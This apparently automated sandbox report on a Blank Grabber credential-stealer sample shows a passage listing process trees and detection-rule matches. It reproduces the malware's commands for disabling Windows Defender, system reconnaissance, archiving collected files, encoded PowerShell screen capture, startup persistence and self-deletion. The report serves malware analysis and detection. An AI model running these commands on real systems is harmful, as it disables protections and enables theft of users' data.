      • cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7200 cmdline: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5228 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4464 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2992 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6204 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1568 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7376 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1968 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7212 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • svchost.exe (PID: 2568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 7 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", ProcessId: 1472, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 6520, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", ProcessId: 7972, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"", ProcessId: 7820, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAG